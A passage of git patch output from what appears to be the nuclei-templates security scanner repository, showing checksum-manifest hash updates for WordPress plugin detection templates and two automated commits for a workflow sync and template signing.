+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:a4304a14b0bf5c6cdbaec19407b012ffa37cc12d -http/technologies/wordpress/plugins/siteorigin-panels.yaml:e0acc4bcaeb0dd379fd210d584f5a0c91e10a1f7 -http/technologies/wordpress/plugins/smart-slider-3.yaml:95951ded3899c0f4c29fa0c18e8bf28f80b0198f -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:60e446ff7c5ffbfd9fc84b2bf830054c7500ae10 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:443d51413fe3c0ca2c000428c4ed7d57bed497f3 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:da1da367c600016ebec6bbcd48309a8ddb1207c2 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:bcbbd13ef7f2c11d94f9f3ccd15b1bca6cd62a4e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:dc0cf66f9c8c9042208bd77778b55e404c4cb7f0 -http/technologies/wordpress/plugins/tablepress.yaml:28843ea2ee1e3e50b44e91f2b9cef4b7abdcff6b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:29a87193f41abbf52684ab5539b5133687849460 -http/technologies/wordpress/plugins/templately.yaml:6f80044d129341f26bc471240b701dc2ec550d5b -http/technologies/wordpress/plugins/the-events-calendar.yaml:62ad444f08ada8bd4f9b0c3713f01a8656ebd3e6 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:c9d749fac52cc97d611af50398f277a66e7173dc -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:3c2c5fe16b6297e20b1df6e4a0db00f38698af75 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:d2069d102610c0bc7bd2f14c3137a06301db6950 -http/technologies/wordpress/plugins/under-construction-page.yaml:774804b4a6bff7f5e47cb72808174fc5976767ee +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:04e006edcdd2d867037e96f0dc42e5b8b5b78145 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:443121b3447e6a00be4436d8541db79ab84c126a +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e37862304b0e12376bdc9d6fceefc366f266865f -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2600b284f8ba280a508f586c2100237ceac0aae7 -http/technologies/wordpress/plugins/webp-express.yaml:70d3f52ccb9a7fd1759f0cd4b907647d7abe1003 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:b2c4df532400beb5e7b02271f917257f566d98fd -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:8f86633e6b34fc3fe700ba70dad9a783c3e16a2d -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:373d9ee9f142d1f88fe4afd8228d07ef2653b3cd -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:a086b2d6547e53cdc430f1ed49710a4abf940975 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:742255868773ed44c25a4fdef38267b73c5a91c6 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:3be6e34f0891ad0fe32cacbd52e28ff0100ba078 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:ca15fe389e71d7f657af3c901a6972b80c68ff4e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:3dba7defada6fbccf9b889a5b295ed82dd4d2d89 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:9e701f842d37ff7a1a3e6504a2a0303adfd5d861 -http/technologies/wordpress/plugins/woocommerce-services.yaml:930cf1ffb005d16e6da16bf4d6c92a0a707440a8 -http/technologies/wordpress/plugins/woocommerce.yaml:079bde38c79f9c3e531d3759ecfff2b6cf9e21d2 -http/technologies/wordpress/plugins/wordfence.yaml:2803d0dbb2c1ccd391d0ae58203c36098d17dc6f -http/technologies/wordpress/plugins/wordpress-importer.yaml:8f6b89d1307fc2020b14e11871a47858817eb1b2 -http/technologies/wordpress/plugins/wordpress-seo.yaml:d0a534eb2966bffd338f642e46fcdf37a798a163 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:e56547c48981a3fe190d96a6cb803196341b3e4b -http/technologies/wordpress/plugins/wp-crontrol.yaml:5f6f2a2474c2bb64c0d1d871caa314e94df6989a -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:a23af976c58083248e0337904e982e1f30bb7fc0 -http/technologies/wordpress/plugins/wp-file-manager.yaml:38c071edeefff43a470f2877f288dc0938e20421 -http/technologies/wordpress/plugins/wp-google-maps.yaml:ad4c9fa1fab661d7f8c2588fc31737d1438149ae -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:619fc98f6555d5adb0b5127acf402716c84a152a -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:a4bb71ff8aa56fccb97649b7090eb3524795d537 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:1662534fe2e89d7fedba8a74107cbf8885e511dc -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:9383ca311784ea52ed0be503d48fdd3cb4aedfb1 -http/technologies/wordpress/plugins/wp-optimize.yaml:8508d3c34c73d7d4dd9d8202be152f755e6b8262 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:5d51d4e7bffeedbd9c0852a93653e48b706b1ad5 -http/technologies/wordpress/plugins/wp-reset.yaml:d242535de21e33dbfc99f663dcbae1bc965628bb -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:a2d1df07a7e33e9eeff1e38ae641951fdaacf455 -http/technologies/wordpress/plugins/wp-rollback.yaml:9e156d2370992648933becb1d8e69a49bb68f43d -http/technologies/wordpress/plugins/wp-seopress.yaml:b32b1a710c9362cbfc01eca3c2a8b5acc3600516 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:31a0d98f373b3cf3392b131edd331980afb89b5e -http/technologies/wordpress/plugins/wp-smushit.yaml:8b7b639b27cfd989621f9328b958ba279a18dc79 -http/technologies/wordpress/plugins/wp-statistics.yaml:0c109f85a91d6679ead344d24fd9f918dd35b43c -http/technologies/wordpress/plugins/wp-super-cache.yaml:4fd4692f86fc66abc8948b80225a3c720a45e079 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:ce2bd3608ef1a242158f9246aa56ab638a66cef3 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:adfa04c39a2792d29421fdbc064fab74fde547b6 -http/technologies/wordpress/plugins/wpforms-lite.yaml:24d730970990889c33863b2de0b32ed6e4f3d7e2 -http/technologies/wordpress/plugins/wps-hide-login.yaml:829c8ba347bbe37ed1a0db1da56f3ab3fd7eb510 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:35da1cd4c5eac7ba5517f9c32d27b1d25826ca69 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:516335ef6dbfc92f587488dad90333634cbf0366 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8901,7 +8902,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eb7f1e8235a08b8ec17727b2ad8217c12df79a7d +templates-checksum.txt:3bfcbafbd85f583d02b2404875bd4b81b8d6def9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 69d37e3600618bbae9bbc8e3e238b2a4cc93af0e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 21 Jul 2024 08:24:10 +0000 Subject: [PATCH 1471/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b597d89480..c5ac47642d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cnvd/2023/CNVD-2023-72138.yaml' - 'http/cves/2022/CVE-2022-45269.yaml' - 'http/cves/2023/CVE-2023-29204.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' From 2337dcedf103b6c69b5357b8b74ef65425e03441 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 21 Jul 2024 08:25:07 +0000 Subject: [PATCH 1472/1841] Auto Template Signing [Sun Jul 21 08:25:07 UTC 2024] :robot: --- http/cnvd/2023/CNVD-2023-72138.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 